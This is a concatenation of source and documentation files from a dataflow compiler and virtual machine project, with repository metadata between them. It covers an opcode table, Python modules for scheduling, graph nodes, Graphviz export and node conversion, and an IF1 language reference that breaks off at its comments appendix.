Appendix: Operations {#Operations}\n\nopCode | Operation\n------------|-----------\nvoid | natives::dvm_Void\nbool | natives::dvm_Bool\nint | natives::dvm_Int\nfloat | natives::dvm_Float\nstring | natives::dvm_String\narray | natives::dvm_Array\nnoOp | natives::dvm_noOp\nisVoid | natives::dvm_isVoid\nequals | natives::dvm_equals\nnotEq | natives::dvm_notEqual\nand | natives::dvm_and\nor | natives::dvm_or\nxor | natives::dvm_xor\nnot | natives::dvm_not\nadd | natives::dvm_add\nsub | natives::dvm_sub\nmul | natives::dvm_mul\ndiv | natives::dvm_div\nfloor | natives::dvm_floor\nceil | natives::dvm_ceil\nmin | natives::dvm_min\nmax | natives::dvm_max\nless | natives::dvm_less\nmore | natives::dvm_more\nlessEq | natives::dvm_less_eq\nmoreEq | natives::dvm_more_eq\nstrContains | natives::dvm_str_contains\nstrFind | natives::dvm_str_find\nstrUpper | natives::dvm_str_upper\nstrLower | natives::dvm_str_lower\nstrSub | natives::dvm_str_sub\nstrRev | natives::dvm_str_reverse\nstrApp | natives::dvm_str_append\narrEmpty | natives::dvm_arr_isEmpty\narrLen | natives::dvm_arr_length\narrEmpty | natives::dvm_arr_empty\narrCreate | natives::dvm_arr_create\narrGet | natives::dvm_arr_get\narrSet | natives::dvm_arr_set\narrIns | natives::dvm_arr_insert\narrRepl | natives::dvm_arr_replace\narrCat | natives::dvm_arr_catenate\narrFrnt | natives::dvm_arr_add_front\narrBck | natives::dvm_arr_add_back\narrSub | natives::dvm_arr_sub" }, { "alpha_fraction": 0.7364085912704468, "alphanum_fraction": 0.7408017516136169, "avg_line_length": 31.51785659790039, "blob_id": "8321ff71b9fcc0f48077b9d8d9507e120e4d499d", "content_id": "5572d6ca940dbec2600a352a8c1313170386cfa6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1821, "license_type": "no_license", "max_line_length": 79, "num_lines": 56, "path": "/DVM/core/scheduler.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# dispatcher.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.scheduler\n# \\brief DVM instruction scheduler\n#\n# This module defines the scheduler.\n# The scheduler is responsible for deciding when and how\n# to execute an instruction.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n##\n# DVM Scheduler\n#\n# Decides when and how to execute an instruction.\n##\nclass Scheduler(object):\n\tdef __init__(self, core):\n\t\tsuper(Scheduler, self).__init__()\n\t\tself.core = core\n\t\t\n\tdef schedule(self, inst, args):\n\t\ttry:\n\t\t\tinst = self.core.memory.get(inst)\n\t\texcept KeyError:\n\t\t\tlog.error(\"Encountered token(s) with faulty destination! %s\", args)\n\t\telse:\n\t\t\tlog.info(\"Scheduling: %s\", inst)\n\t\t\tinst.execute(args, self.core)\n" }, { "alpha_fraction": 0.6694287061691284, "alphanum_fraction": 0.6726268529891968, "avg_line_length": 24.201465606689453, "blob_id": "33fa7e312edb52198824f871b62a9be905e71602", "content_id": "10b480fea7da6c3adc42429d7cc65849b18a0af2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6879, "license_type": "no_license", "max_line_length": 82, "num_lines": 273, "path": "/DISc/IGR/node.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# nodes.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.node\n# \\brief Node definitions\n# \n# IGR node types. \n##\n\nimport port\nimport copy\n\n# ------------------ #\n# Unique Identifiers #\n# ------------------ #\n\n__KEY__ = 0\n\n##\n# Generate unique id.\n#\n# Generate a key that serves as a unique\n# id for a node.\n# Mainly useful for debugging purposes.\n##\ndef getKey():\n\tglobal __KEY__\n\ti = __KEY__\n\t__KEY__ += 1\n\treturn i\n\n# ----- #\n# Nodes #\n# ----- #\n\n##\n# Standard node.\n#\n## \nclass Node(object):\n\n\t##\n\t# Create a new node.\n\t#\n\t# \\param subGraph\n\t#\t\tThe subgraph this node belongs to.\n\t# \\param inputs\n\t#\t\tThe amount of inputs this node will accept\n\t#\t\tThis argument is optional, the input amount\n\t# \t\twill be updated depending on the amount of \n\t#\t\tincoming edges.\n\t# \\param outputs\n\t#\t\tThe amount of outputs this node will return.\n\t#\t\tThe same rules that apply to inputs apply here.\n\t##\n\tdef __init__(self, subGraph, inputs = 0, outputs = 0, key = None):\n\t\tsuper(Node, self).__init__()\n\t\tself.subGraph = subGraph\n\t\tself.key = getKey()\n\t\tself.inputs = inputs\n\t\tself.outputs = outputs\n\t\tself.inputPorts = [port.InputPort(self, i) for i in xrange(0,inputs)]\n\t\tself.outputPorts = [port.OutputPort(self, i) for i in xrange(0,outputs)]\n\n\t##\n\t# Create a copy of a node.\n\t# This will create an identical, unique node, \n\t# but with unconnected in and output ports.\n\t##\n\tdef copy(self, subGraph):\n\t\tnode = copy.deepcopy(self)\n\t\tnode.subGraph = subGraph\n\t\tnode.key = getKey()\n\n\t\tnode.inputPorts = [port.InputPort(node, i) for i in xrange(0,node.inputs)]\n\t\tnode.outputPorts = [port.OutputPort(node, i) for i in xrange(0,node.outputs)]\n\n\t\treturn node\n\n\t##\n\t# Create a printable version of the node\n\t##\n\tdef __str__(self):\n\t\tname = self.__class__.__name__\n\t\treturn name + \" \" + \"'\" + str(self.key) + \"'\"\n\n\t##\n\t# Gets an input port. Create it if it doesn't exist yet.\n\t# This allows us to determine the amount of inputs\n\t# a certain node will have, even if this is not explicit in IF1\n\t#\n\t# \\param idx\n\t# \t\tThe idx of the port you need\n\t# \\return\n\t#\t\tThe port at idx\n\t##\n\tdef getInputPort(self, idx):\n\t\ttry:\n\t\t\tres = self.inputPorts[idx]\n\t\t\treturn res\n\t\texcept IndexError:\n\t\t\tself.inputPorts += [port.InputPort(self, self.inputs)]\n\t\t\tself.inputs += 1\n\t\t\treturn self.getInputPort(idx)\n\n\t##\n\t# Gets an output port. Create it if it doesn't exist yet.\n\t# This allows us to determine the amount of outputs\n\t# a certain node will have, even if this is not explicit in IF1\n\t#\n\t# \\param idx\n\t# \t\tThe idx of the port you need\n\t# \\return\n\t#\t\tThe port at idx\n\t##\n\tdef getOutputPort(self, idx):\n\t\ttry:\n\t\t\tres = self.outputPorts[idx]\n\t\t\treturn res\n\t\texcept IndexError:\n\t\t\tself.outputPorts += [port.OutputPort(self, self.outputs)]\n\t\t\tself.outputs += 1\n\t\t\treturn self.getOutputPort(idx)\n\n\n\t## See if this node can be followed to other nodes.\n\tdef hasNext(self): return True\n\n\t## See if this node can be follow to other nodes.\n\tdef hasPrevious(self): return True\n\n\t## Check if this node is a compound node\n\tdef isCompound(self): return False\n\n\t## Check if this node is a call node\n\tdef isCall(self): return False\n\n\n# --------------------------- #\n# Graph entry and exit points #\n# --------------------------- #\n\n##\n# Entry point of a subgraph.\n# \n# Defines the topmost point of a subgraph.\n# Nodes in the subgraph use this node to get their inputs.\n#\n# This corresponds to the values of the parameters for a function\n# invocation.\n##\nclass SubGraphEntryNode(Node): \n\n\tdef __init__(self, subGraph, outputs):\n\t\tsuper(SubGraphEntryNode, self).__init__(subGraph, 0, outputs)\n\t\tself.inputPorts = []\n\n\tdef getInputPort(self, idx): return None\n\tdef hasPrevious(self): return False\n\n##\n# Exit point of a subgraph.\n# \n# Defines the leaves of a subgraph.\n# Nodes in the subgraph use this node to dump their outputs.s\n#\n# This corresponds to the return value of a function.\n##\nclass SubGraphExitNode(Node): \n\n\tdef __init__(self, subGraph, inputs):\n\t\tsuper(SubGraphExitNode, self).__init__(subGraph, inputs, 0)\n\t\tself.outputPorts = []\n\n\tdef hasNext(self): return False\n\tdef getOutputPort(self, idx): return None\n\n# -------------- #\n# Standard Nodes #\n# -------------- #\n\n##\n# Operation node\n#\n# This class defines a standard dataflow operation.\n# It contains the standard in and output ports along with\n# the function that it represents.\n##\nclass OperationNode(Node):\n\tdef __init__(self, subGraph, operation):\n\t\tsuper(OperationNode, self).__init__(subGraph)\n\t\tself.operation = operation\n\n\tdef __str__(self):\n\t\tkey = str(self.key)\n\t\topname = self.operation\n\t\treturn \"OpN '\" + key + \"' \" + opname \n\n##\n# Call node\n#\n# Represents an operation that calls a function (a subgraph)\n# The output ports of the callnode are bound to the return values of the function.\n##\nclass CallNode(Node):\n\tdef __init__(self, subGraph, function):\n\t\tsuper(CallNode, self).__init__(subGraph)\n\t\tself.function = function\n\n\tdef __str__(self):\n\t\tfunc = str(self.function)\n\t\treturn \"CallN '%d' %s\" % (self.key, func)\n\n\tdef isCall(self): return True\n\t\n##\n# Constant node\n#\n# Represents an instruction that just\n# forwards it's value once it receives input.\n##\nclass ConstantNode(Node):\n\tdef __init__(self, subGraph, value):\n\t\tsuper(ConstantNode, self).__init__(subGraph)\n\t\tself.value = value\n\n\tdef __str__(self):\n\t\treturn \"Const '%d' %s\" % (self.key, self.value)\n\n# -------------- #\n# Compound Nodes #\n# -------------- #\n\n##\n# Compound node\n#\n# Represents a node that contains subgraphs.\n# Examples of such nodes include if-then-else, for loops, ...\n##\nclass CompoundNode(Node):\n\tdef __init__(self, subGraph, type, subGraphs):\n\t\tsuper(CompoundNode, self).__init__(subGraph)\n\t\tself.subGraphs = subGraphs\n\t\tself.type = type\n\n\tdef isCompound(self): return True\n\t\n\tdef __str__(self): \n\t\treturn \"C %d: %s\" % (self.key, self.type)" }, { "alpha_fraction": 0.685303270816803, "alphanum_fraction": 0.6870828866958618, "avg_line_length": 26.410568237304688, "blob_id": "ca9520254dba3fd5bf8ceb8ccf004b9b8df34d88", "content_id": "8126581fa9520190a842393eb1c6ee01acae8396", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6743, "license_type": "no_license", "max_line_length": 86, "num_lines": 246, "path": "/DISc/IGR/dot.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# dot.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package IGR.dot\n# \\brief IGR dot parser\n# \n# This module can return a dot version of the graph.\n# Mainly useful for debugging the compilation process.\n##\n\nimport traverse\n\nimport StringIO\nimport subprocess\n\nimport logging\nlog = logging.getLogger(__name__)\n\n# --------- #\n# Subgraphs #\n# --------- #\n\n##\n# Add the attributes of the subgraph.\n##\ndef subGraphHeader(buffer, subGraph):\n\tname = subGraph.name.replace(\".\", \"_\")\n\tbuffer.write(\"subgraph cluster_\" + name + \" {\\n\")\n\tbuffer.write(\"label = \" + name + \"\\n\")\n\tbuffer.write(\"graph [pencolor = black, bgcolor = white]\\n\")\n\n## \"close\" the subgraph.\ndef subGraphFooter(buffer, subGraph):\n\tbuffer.write(\"}\\n\")\n\n# -------- #\n# Compound #\n# -------- #\n\ndef compoundHeader(buffer, node):\n\tname = str(node.key)\n\tbuffer.write(\"subgraph cluster_compound_\" + name + \" {\\n\")\n\tbuffer.write(\"label = compound_\" + name + \"\\n\")\n\tbuffer.write(\"graph [pencolor = black, bgcolor = lightgrey]\\n\")\n\ndef compoundFooter(buffer, node):\n\tbuffer.write(\"}\\n\")\n\n# ----- #\n# Ports #\n# ----- #\n\n##\n# Get a representation for a port.\n#\n# \\return \n# \t\tReturn the value of the literal, if this port\n#\t\taccepts a literal. * if this port is connected to\n#\t\tanother port. Returns the empty string if this port\n#\t\tis not connected to anything\n##\ndef portString(port, preFix = \"\"):\n\tif port.acceptsLiteral(): return str(port.source.value)\n\telif port.isConnected(): return \"<\" + preFix + str(port.idx) + \">\" + \" *\"\n\telse: return \"<\" + preFix + str(port.idx) + \">\"\n\n##\n# String representation of a port list.\n#\n# \\param portLst\n#\t\tThe list with ports, should not be None\n#\n# \\return \n# \t\tReturns a string that will show the values of all the ports\n# \t\tin a horizontal line when parsed by dot.\n# \t\tReturns the empty string if the portLst is None\n##\ndef ports(portLst, prefix = \"\"):\n\tres = \"\"\n\tfor port in portLst:\n\t\tres += \"|\" + portString(port, prefix)\n\treturn \"{\" + res[1:] + \"}\"\n\n## Get the portlist for the inputs of a node.\ndef inputList(node):\n\tif node.inputPorts:\n\t\treturn ports(node.inputPorts, \"I\") + \"|\"\n\telse: return \"\"\n\n## Get the portlist for the outputs of a node.\ndef outputList(node):\n\tif node.outputPorts:\n\t\treturn \"|\" + ports(node.outputPorts, \"O\")\n\telse: return \"\"\n\n# ----- #\n# Nodes #\n# ----- #\n\n## Identifier of the node.\ndef nodeIdentifier(node):\n\treturn str(node.key)\n\n## Convert a connection to a string\ndef edgeStr(srcNode, scrPort, dstNode, dstPort):\n\tsrc = nodeIdentifier(srcNode) + \" : O\" + str(scrPort) \n\tdst = nodeIdentifier(dstNode) + \" : I\" + str(dstPort)\n\treturn src + \" -> \" + dst + \";\"\n\n## Add the label of the node to the buffer. \ndef nodeLabel(buffer, node):\n\tbuffer.write(nodeIdentifier(node))\n\tbuffer.write(' [')\n\tbuffer.write('label=\"' + '{' + inputList(node) + str(node) + outputList(node) + '}\"')\n\tif node.isCompound(): buffer.write(\"style = filled, fillcolor = lightgrey\")\n\tif node.isCall(): buffer.write(\"style = dashed\")\n\tbuffer.write('];\\n')\n\n## Add all the outgoing edges of a node to the buffer.\ndef nodeLinks(buffer, node):\n\tif node.hasNext():\n\t\tfor port in node.outputPorts:\n\t\t\tfor target in port.targets:\n\t\t\t\tbuffer.write(edgeStr(node, port.idx, target.node, target.idx) + \"\\n\")\n\n## Write the information of a node to the buffer\ndef node(buffer, node):\n\tnodeLabel(buffer, node)\n\tnodeLinks(buffer, node)\n\n# --- #\n# Dot #\n# --- #\n\n## Write general dot information\ndef dotHeader(buffer):\n\tbuffer.write(\"digraph IGR {\\n\")\n\tbuffer.write(\"graph [compound=true, dpi = 300];\\n\")\n\tbuffer.write(\"node [shape=record];\\n\")\n\n## Close the dot graph\ndef dotFooter(buffer):\n\tbuffer.write(\"}\")\n\n## Create the dot string\ndef getDot(skipCompound):\n\tbuffer = StringIO.StringIO()\n\tdotHeader(buffer)\n\n\ttraverse.traverse(\n\t\tlambda nd: node(buffer, nd),\n\t\tlambda sg: subGraphHeader(buffer, sg),\n\t\tlambda sg: subGraphFooter(buffer, sg),\n\t\tskipCompound,\n\t\tlambda nd: compoundHeader(buffer, nd),\n\t\tlambda nd: compoundFooter(buffer, nd)\n\t)\n\n\tdotFooter(buffer)\n\tstr = buffer.getvalue()\n\tbuffer.close()\n\treturn str\n\n##\n# Get the dot representation and \n# write it to a file.\n##\ndef dotToFile(path, skipCompound = True):\n\tf = open(path, 'w')\n\tf.write(getDot(skipCompound))\n\tf.close()\n\n##\n# Convert the IGR graph to dot, save it,\n# and run dot on this file. \n#\n# This function should be call with keyword arguments.\n# The default arguments will cause the following behaviour:\n# \t\t* dot is assumed to be in your PATH.\n#\t\t* the dot file will be saved in igr.dot\n#\t\t* the output will be in png format.\n#\t\t* dot will decide where to store the output.\n#\t\t\tWith the default settings this would be in igr.dot.png\n#\n# \\param dotpath\n#\t\tThe path of the dot executable, in case it's not in your PATH\n# \\param path\n#\t\tThe location where the dot file will be stored.\n# \\param format\n#\t\tThe output format of the graph dot creates from the dot file.\n# \\param output\n#\t\tThe location where we store the output of dot.\n#\t\tLeaving this blank will pass the -O option.\n#\t\tThe -O option let's dot choose the path.\n# \\param other\n#\t\tAny other options you want to pass to doth.\n#\t\tThese options should be passed as a list of strings.\n# \\param skipCompound \n#\t\tTrue if you do not want to display the compound nodes.\n##\ndef dot(\n\tdotpath = \"dot\",\n\tpath = \"igr.dot\", \n\tformat = \"png\", \n\toutput = \"\", \n\tother = [], \n\tskipCompound = True\n\t):\n\n\tdotToFile(path, skipCompound)\n\n\tformat = \"-T\" + format\n\n\tif output: output = \"-o\" + output\n\telse: output = \"-O\"\n\n\ttry:\n\t\tsubprocess.check_call([dotpath, format, path, output] + other)\n\texcept subprocess.CalledProcessError, e:\n\t\tlog.error(\"Dot returned with exit code %d\", e.returncode)\n\texcept OSError:\n\t\tlog.error(\"Dot executable not found\")\n" }, { "alpha_fraction": 0.7108745574951172, "alphanum_fraction": 0.7177790403366089, "avg_line_length": 28.709402084350586, "blob_id": "00f881ef84d92974b54d988feb12f5ea2aa54424", "content_id": "f6e28eb9bd4c84868dae45cd74807882237c0a2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3476, "license_type": "no_license", "max_line_length": 79, "num_lines": 117, "path": "/DISc/backEnd/DVM/nodeConverter.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# nodeConverter.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.nodeConverter\n# \\brief IGR node converter\n# \n# This module can convert the various IGR\n# node types into an equivalent DIS statement.\n##\n\nimport IGR\nimport IGR.node\n\ndef addLinks(dis, node):\n\tfromKey = dis.getFromKey(node)\n\n\tfor port in node.outputPorts:\n\t\tfromPort = port.idx\n\n\t\tfor port in port.targets:\n\t\t\ttoKey = dis.getToKey(port.node)\n\t\t\ttoPort = port.idx\n\n\t\t\tdis.addLink(fromKey, fromPort, toKey, toPort)\n\ndef addLiterals(dis, node):\n\tkey = dis.getToKey(node)\n\n\tfor port in node.inputPorts:\n\t\tif port.acceptsLiteral():\n\t\t\tdis.addLiteral(key, port.idx, port.source.value)\n\ndef convertGeneralNode(dis, node, chunk, type, args):\n\tkey = dis.addInstruction(chunk, type, args)\n\tdis.linkNode(node, key, key)\n\treturn key\n\ndef convertNode(dis, node):\n\treturn convertGeneralNode(dis, node, 0, 'SNK', [])\n\ndef convertOpNode(dis, node): \n\treturn convertGeneralNode(dis, node, 1, 'OPR', [node.operation, node.inputs])\n\ndef convertConstantNode(dis, node):\n\treturn convertGeneralNode(dis, node, 0, 'CNS', [\"<=\", node.value])\n\ndef convertSGEntryNode(dis, node):\n\treturn convertGeneralNode(dis, node, 0, 'SNK', [])\n\ndef convertSGExitNode(dis, node): \n\treturn convertGeneralNode(dis, node, 0, 'RST', [])\n\ndef convertCallNode(dis, node):\n\tins = dis.addInstruction(0, 'CHN', [node.inputs, node.outputs])\n\tret = dis.addInstruction(0, 'SNK', [])\n\tdis.linkNode(node, ins, ret)\n\n\tdest = None\n\tnode = IGR.getSubGraph(node.function).entry\n\ttry:\n\t\tdest = dis.getToKey(node)\t\n\texcept KeyError:\n\t\tdest = ('%d', '%d')\n\t\tdis.addCallIdx(node, dis.getIdx(0) - 1)\n\n\tapp = ' '.join(map(str, [dest[0], dest[1], ret[0], ret[1]]))\t\n\tdis.modifyString(0, dis.getIdx(0) - 1, lambda str : \"%s %s\" % (str, app))\n\treturn ins\n\n\nconverters = {\n\tIGR.node.Node : convertNode,\n\tIGR.node.SubGraphEntryNode : convertSGEntryNode,\n\tIGR.node.SubGraphExitNode : convertSGExitNode,\n\tIGR.node.OperationNode : convertOpNode,\n\tIGR.node.CallNode : convertCallNode,\n\tIGR.node.ConstantNode : convertConstantNode,\n}\n\n##\n# Add the DIS equivalent of a certain node\n# to a DIS object.\n#\n# \\param dis\n#\t\tA DIS instance that will contain the DIS version\n#\t\tof the node.\n# \\param node\n#\t\tThe node to convert.\n#\n# \\return The key of the node in DIS.\n##\ndef convertNode(dis, node):\n\treturn converters[type(node)](dis, node)\n" }, { "alpha_fraction": 0.530928373336792, "alphanum_fraction": 0.5457242131233215, "avg_line_length": 62.35034942626953, "blob_id": "0fb2681db85018495defe493d000215eb8d3c7a9", "content_id": "755dd7f5a92215be30b1fed037c99456442593db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 27305, "license_type": "no_license", "max_line_length": 451, "num_lines": 431, "path": "/doc/IF1.md", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "<!-- Written by Mathijs Saey at the VUB, all rights reserved -->\n\n# IF1 Quick Reference\n\nThis page serves as a basic introduction to the IF1 language.\nThe information on this page is based on the paper: `IF1 - An Intermediate Form for Applicative Languages. (Stephen Skedzielewski 1985)`\n\nOn this page, we attempt to create a compact yet complete overview of the language that should be enough to write an if1 parser without any previous IF1 knowledge.\n\nA few IF1 and Sisal examples are present in the repository, a copy of these examples is also present in the documentation:\n* [Simple piece of Sisal/IF1 code](_Simple.html)\n* [Simple call in Sisal/IF1](_Call.html)\n* [Select compound node in Sisal/IF1](_Select.html)\n* [Sorting algorithm in Sisal/IF1](_Sort.html)\n\n[TOC]\n\n# IF1 Concepts {#Concepts}\n\nIF1 represents directed, acyclic graphs, these graphs have a few components.\n\n* IF1 nodes are operations.\n * a node can have an arbitrary amount of in -and outputs.\n * IF1 defines over 50 nodes, that is, \"native\" operations.\n * The in -and output of a node happens through **ports**, which are numbered indicators of in and output locations\n * Port indexing starts from 1\n * Not every node has a predefined amount of ports.\n* Edges represent data paths between nodes.\n * Edges carry **type information**\n * Not mandatory\n * Can describe user-defined types and built-in types.\n * A special edge exists to describe literal constants.\n * Don't contain a source port\n * Contain the value of a literal as a string.\n* Graph boundaries surround groups of nodes and edges.\n\n# IF1 Instructions {#Form}\n\nIF1 instructions are delimited by newlines. The first character after a newline determines the type of instruction the line represents, the rest of the line consists of a number of whitespace separated fields, the amount of which depends on that specific instruction. Any extra text listed after the fields is considered to be a comment, so are lines that start with C. For more information about comments, look into [appendix A](#Comments).\n\nThe following table lists the different instructions types.\n\nCharacter | Represents | Syntax \n----------| -----------|-------\nT | type | `T label type_code arg_1 arg_2 `\nE | edge | `E source_node port destination_node port type `\nL | literal | `L destination_node port type string `\nG | subgraph of a compound node | `G type_reference `\nG | local function graph | `G type_reference \"name\" `\nX | global function graph | `X type_reference \"name\" `\nI | imported function | `I type_reference \"name\" `\nN | simple node | `N label operation `\n{ | start compound node | `{ Compound label operation`\n} | end compound node | `} label operation association_list_length association_list_element_1 association_list_element_2 ...`\n\n\nThe semantics of these instructions are explained below, explanation about *labels* and *types* are presented in the [labels and types](#types) section.\n\n* Simple nodes simply contain a label and an identifier, this identifier represents a native IF1 instruction. \n* Compound nodes contain subgraphs and represent more complex operations, such as a for loop.\n* The compound node contains a few subgraphs that represent parts of the compound node, such as the initialization and the condition check, the association list shows which subgraphs represent which action.\n* Graph boundaries represent a function and simply contain the type (check out the function type) and name of this function.\n* Graph boundaries have a scope associated with them, anything below the boundary declaration is part of the graph's scope until either a \"}, G,X or I\" is encountered.\n* Subgraphs in compound nodes are not required to give a type.\n* Edges simply contain the input node, and the port on this node, the destination node, and the port on this node that this edge leads to. Furthermore, the edge also contains the type of it's data.\n* Literals contain their destination, the port on this destination, their type and a string version of their counts. [Appendix B](ref #Literal_def) contains an overview of some of the most common literals.\n\n## Labels and Types {#types}\n\nIF1 instructions commonly contain a type identifier, the purpose of this section is to explain IF1 type definitions, any defined type is referred to by it's *label*.\n\nLabels are represented by integers, and are used to identify nodes and types. Nodes and types do not share labels, that is, a node and a type may have the same integer as label without being related in any way. Type labels share a global scope, while Node labels only have to be unique within their enclosing graph. It's also worth noting that a missing or unknown type is referred to by using the label 0.\n\nWith that being said, we can look at the type definitions:\n\n T label type_code arg_1 arg_2\n\n* Label can be used to refer to the type later on.\n* The type code can be considered to be an argument that indicates what type of type we are dealing with. This code can be seen as a constructor for that type.\n* The exact use of the other codes depends on the type_code. They can be seen as the arguments to a type constructor.\n\nTo clarify this, let's look at a basic sisal type. In this case, the boolean.\n\n`T 1 1 0 %na=Boolean`\n\n* T implies that we are declaring a type\n* 1 is the *label* of the type, it will be used to refer to the type we are constructing from now on.\n* 1 is the *type_code* of the type. This particular type code tells us that we are dealing with a *basic code*.\n* From the information of the type_code, we know that 0 is a basic code, in this case the basic code 0 represents a boolean.\n* The rest of the line is a comment, it tells us we are dealing with a boolean.\n\nWhat follows is a table of the possible type codes and their meaning.\n\nCode | Type | Argument 1 | Argument 2 \n-----|----------|------------|-----------\n0 | Array | Base type | ` none `\n1 | Basic code | Basic code | ` none `\n2 | Field | Field type | Next field\n3 | Function | Argument type | Result type\n4 | Multiple | Base type | ` none `\n5 | Record | First field | ` none `\n6 | Stream | Base type | ` none `\n7 | Tag | Tag type | Next tag\n8 | Tuple | Type | Next in tuple\n9 | Union | First Tag | ` none `\n\nIn the following sections, the different types are described.\n\n#### Basic types\n\nAs the example in the parent section indicates, basic types simply indicate a standard type, the argument is simply a code that tells us which type we are dealing with. A table with the basic types and their code can be found below.\n\nCode | Type\n-----|-----\n0 | Boolean\n1 | Character\n2 | Double\n3 | Integer\n4 | Null\n5 | Real\n6 | WildBasic*\n\n`* This type does not appear in the official reference, but is generated by sisalc 14.1.\n\n#### Array and Streams\n\nArrays and streams simply point to the *label* of the type they contain.\n\n#### Records and fields, unions and tags. And tuples.\n\nA record can be seen as a pointer to a field. It simply contains it's label, the type_code that indicates it's a record and the *label* of it's first field.\n\nA field contains it's label, it's type_code, the *label* of the type it contains, and the *label* of the next field. The last field contains 0 as the *label* that points to the next field.\n\nUnions and tags work in the same way, the only difference is that unions can be seen as a pointer to a tag. A tag points to the next tag like a field points to the next field.\n\nTuples follow the same contain your own type, point to the next one convention, but don't require an initial pointer.\n\n#### Functions\n\nA function type simple contains \"pointers\" to 2 tuples, the first tuple represents the arguments this function accepts while the second tuple represents the result it returns.\n\nIn terms of higher level languages, the function type simple declares the function's signature, without the name.\n\n\n# Appendix A: Comments {#Comments}\n\n2 main 